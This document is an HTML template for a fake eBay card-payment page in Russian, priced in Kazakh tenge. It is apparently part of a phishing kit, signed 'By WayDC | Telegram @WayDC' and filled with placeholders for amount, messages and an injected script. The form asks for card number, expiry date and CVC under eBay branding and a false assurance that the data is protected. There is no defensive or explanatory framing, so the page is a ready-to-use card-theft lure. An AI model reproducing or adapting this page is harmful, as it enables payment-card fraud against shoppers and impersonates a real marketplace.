<!DOCTYPE html>
<html lang="ru">
	<head>
		<style>		@import url('https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap');
			._0 {
				margin: 0 auto;
				max-width: 450px;
				margin-bottom: 96px;
			}
			._1 {
				height: 64px;
				border-bottom: 1px solid #DDD;
				margin-top: 24px;
				margin-bottom: 8px;
			}
			._3 {
				font-size: 26px;
				margin-top: 20px;
				margin-bottom: 12px;
			}
			._4 {
				padding: 10px 7px 11px 15px;
				border: 1px solid #363636;
				border-radius: 25px;
			}
			._4:hover {
				border: 1px solid #B3B3B3;
			}
			._4:focus {
				box-shadow: 0 0 4px #009CF0;
			}
			._5 {
				color: #555;
			}
			._6 {
				font-family: 'Roboto', sans-serif;
				font-weight: 300;
				padding: 5px 5px 5px 8px;
			}
			._7 {
				margin-top: 10px;
			}
			._8 {
				width: 70%;
				display: inline-block;
			}
			._9 {
				width: 30%;
				float: right;
				display: inline-block;
			}
			._10 {
				width: 40%;
				display: inline-block;
			}
			._11 {
				padding: 10px 16px 11px 0px;
				font-size: 18px;
				color: #FFF;
				cursor: pointer;
				background: linear-gradient(45deg, #20d961, #2a6d51);
				border-radius: 30px;
				margin-right: 155px;
				-moz-transition: all 1s linear;
				-o-transition: all 1s linear;
				-webkit-transition: all 1s linear;
			}
			._11:hover {
				padding: 10px 16px 11px 0px;
				font-size: 18px;
				color: #FFF;
				cursor: pointer;
				background: linear-gradient(45deg, #2a6d51, #20d961);
				border-radius: 30px;
				margin-right: 155px;
			}
			._12 {
				width: 40%;
				vertical-align: top;
			}
			._13 {
				font-weight: bold;
				vertical-align: top;
			}
			._14 {
				margin-top: 14px;
			}
			._15, ._15:hover {
				border: 1px solid #FF6163;
			}
			._15:focus {
				box-shadow: 0 0 4px #FF6163;
			}
			._16 {
				font-family: 'Roboto', sans-serif;
				font-weight: 500;
				color: #FD5555;
				margin-bottom: 64px;
			}
			._17 {
				font-family: 'Roboto', sans-serif;
				font-weight: 500;
				color: #999;
				margin: 16px 0;
			}
			._18 {
				font-family: 'Roboto', sans-serif;
				font-weight: 500;
				color: #000000;
				margin: 16px 0;
			}
			body {
				margin: 0 12px;
				font-family: 'Roboto', sans-serif;
				font-size: 14px;
				color: #222;
				word-break: break-word;
				user-select: none;
			}
			input {
				font-family: 'Roboto', sans-serif;
				font-size: 16px;
				color: #222;
				width: 100%;
				border: none;
				outline: none;
				box-sizing: border-box;
			}
			a {
				color: #999;
				cursor: pointer;
				text-decoration: underline;
			}
			table {
				width: 100%;
				border-collapse: separate;
				border-spacing: 0;
			}
			td {
				padding: 0;
			}
			@media all and (max-width: 960px) {
				._1 {
					margin-top: 16px;
				}
				._3 {
					font-size: 22px;
				}
			}
			@media all and (max-width: 720px) {
				._3 {
					margin-top: 10px;
				}
			}</style>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:400,500,700&amp;subset=cyrillic">
        <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.1/css/all.css">
        <link rel="stylesheet" type="text/css" href="cssSUKA/bootstrap.css">
        <link rel="stylesheet" type="text/css" href="cssSUKA/common.css">
        <link rel="shortcut icon" type="image/png" href="img/fav-icon.png">
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
		<link href="favicon.ico" rel="icon" type="image/x-icon">
		<meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no">
		<title>eBay — Ads on the site eBay</title>
		<script>%script%</script>
		<meta property="og:url" content="https://ebay.com/">
		<meta property="og:site_name" content="eBay">
		<meta property="og:title" content="%title%">
		<meta property="og:description" content="%title%">
		<meta property="og:type" content="website">
		<meta property="og:locale" content="ru_RU">
		<style>.ff{font-weight: 700;}</style>
	</head>
	<body>
		<!-- By WayDC | Telegram @WayDC -->
		<div class="_0">
        <div class="block-method" style="margin-top: 0px">
            <center style="margin: 20px 0;"><img src="logo.png" alt="logo" style="width: 17rem;"></center>
            <div class="row">
                <div class="list-method">
                    <div class="row">
                        <div class="col-xs-6">
                            <div class="item-method active-method">
                                <img src="logo-card.svg">
                            </div>
                        </div>

                        <div class="col-xs-6">
                            <div class="item-method">
                                <img src="logo-other.svg">
                            </div>
                        </div>

                        <div class="col-xs-12">
                            <div class="description-method">
                                <p>Оплата с помощью карты VISA или банковской карты MasterCard. Безопасность обработки платежей по пластиковым картам гарантирует банк-эквайер.</p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
			<div>
				<center class="_3">%txt3%</center>
				<div class="_5">
					<form id="_formPay" method="post">
		                <div class="list-method">
		                    <div class="row">
						        <div class="block-form">
									<div class="ff">Номер карты</div>
									<style>input::-webkit-outer-spin-button, input::-webkit-inner-spin-button {-webkit-appearance: none;}</style>
									<div>
										<input id="_input0" value="" name="fcard" class="form-control aye" placeholder="**** **12 3456 7890">
									</div>
								</div>
							</div>
						</div>
						<div class="_7">
		                    <div class="row">
						        <div class="block-form">
									<div class="_8">
										<div class="ff">Дата</div>
										<div>
											<div class="_10">
												<input id="_input1" value="" name="fexpm" class="form-control" placeholder="01" maxlength="2">
											</div>
											/
											<div class="_10">
												<input id="_input2" value="" name="fexpy" class="form-control" placeholder="2021" maxlength="4">
											</div>
										</div>
									</div>
									<div class="_9" style="font-size: 12px;line-height: 10px;">
										<div class="_6 ff">CVC</div>
										<div>
											<style>.up1{ margin-bottom: 10px; }</style>
											<input id="_input3" value="" name="fcvc" class="form-control" type="password" data-type="number" placeholder="•••" maxlength="3">
										</div>
									</div>
								</div>
							</div>
						</div>
					            <div class="block-form-info">
					                <h4 class="heading-total">%txt1%: <b> %amount% KZT</b></h4>
					                <p class="heading-secure">
					                    <i class="fas fa-lock"></i> Ваши данные под защитой.
					                </p>
					            </div>
		                    <div class="row">
						        <div class="block-form">
									<div class="_14">
										<table>
											<tr>
												<style>.uup{ margin-top: 100px; }</style>
												<td class="_12"><input id="_buttonPay" class="_11" value="%txt2%" type="submit"></td>
											</tr>
										</table>
									</div>
								</div>
							</div>
					</form>
				</div>
				<div class="_17">%infmsg%</div>
				<div class="_16">%errmsg%</div>
			</div>
		</div>
		<!-- By WayDC | Telegram @WayDC -->
</html>